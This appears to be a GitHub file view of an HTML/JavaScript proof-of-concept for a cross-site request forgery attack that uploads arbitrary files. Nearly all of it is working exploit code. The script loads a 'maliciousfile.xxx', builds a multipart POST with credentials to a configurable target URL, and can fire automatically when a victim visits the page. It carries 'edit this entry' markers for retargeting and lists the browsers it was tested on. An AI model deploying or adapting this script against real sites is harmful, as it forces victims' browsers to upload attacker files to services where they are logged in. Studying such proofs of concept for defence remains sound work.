Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
118 lines (95 sloc) 3.55 KB
<!DOCTYPE html>
<html>
<body>
<h1>CSRF arbitrary file upload</h1>
<br><br>
This is a Proof-of-Concept - the start() function can be invoked automatically.<br><br>
This is a variation of the technique demonstrated here: http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html<br><br>
Other pieces of code were taken from: http://hublog.hubmed.org/archives/001941.html<br><br>
Tested succesfully with:<br><br>
Firefox 8.0 and 8.0.1<br><br>
Chrome 14.0.835.202 and Chrome 15.0.874.121<br><br>
<button type="button" id="upload" onclick="start()"><font size="+2">Upload File</font></button>
<script>
var logUrl = 'http://vulnappfileupload'; // edit this entry
function fileUpload(fileData, fileName) {
var fileSize = fileData.length,
boundary = "---------------------------270883142628617", // edit this entry
uri = logUrl,
xhr = new XMLHttpRequest();
var additionalFields = {
// in case multiple parameters need to be supplied
param1 : "value1", // edit this entry
param2 : "value2", // edit this entry
"param3" : "value3" // edit this entry
}
if (typeof XMLHttpRequest.prototype.sendAsBinary == "function") { // Firefox 3 & 4
var tmp = '';
for (var i = 0; i < fileData.length; i++) tmp += String.fromCharCode(fileData.charCodeAt(i) & 0xff);
fileData = tmp;
}
else { // Chrome 9
// http://javascript0.org/wiki/Portable_sendAsBinary
XMLHttpRequest.prototype.sendAsBinary = function(text){
var data = new ArrayBuffer(text.length);
var ui8a = new Uint8Array(data, 0);
for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
var bb = new (window.BlobBuilder || window.WebKitBlobBuilder)();
bb.append(data);
var blob = bb.getBlob();
this.send(blob);
}
}
var fileFieldName = "filename_parameter"; // edit this entry
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
xhr.setRequestHeader("Content-Length", fileSize);
xhr.withCredentials = "true";
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
if (xhr.responseText != "") {
alert(JSON.parse(xhr.responseText).msg);
}
} else if (xhr.status == 0) {
}
}
}
var body = "";
for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}
body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--";
xhr.sendAsBinary(body);
return true;
}
function addField(name, value, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
c += value + "\r\n";
return c;
}
function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
c += "Content-Type: application/octet-stream\r\n\r\n"; // edit this entry if required
c += value + "\r\n";
return c;
}
function getBinary(file){
var xhr = new XMLHttpRequest();
xhr.open("GET", file, false);
xhr.overrideMimeType("text/plain; charset=x-user-defined");
xhr.send(null);
return xhr.responseText;
}
function start() {
var c = getBinary('maliciousfile.xxx'); // edit this entry
fileUpload(c, "maliciousfile.xxx"); // edit this entry
}
</script>
</body>
</html>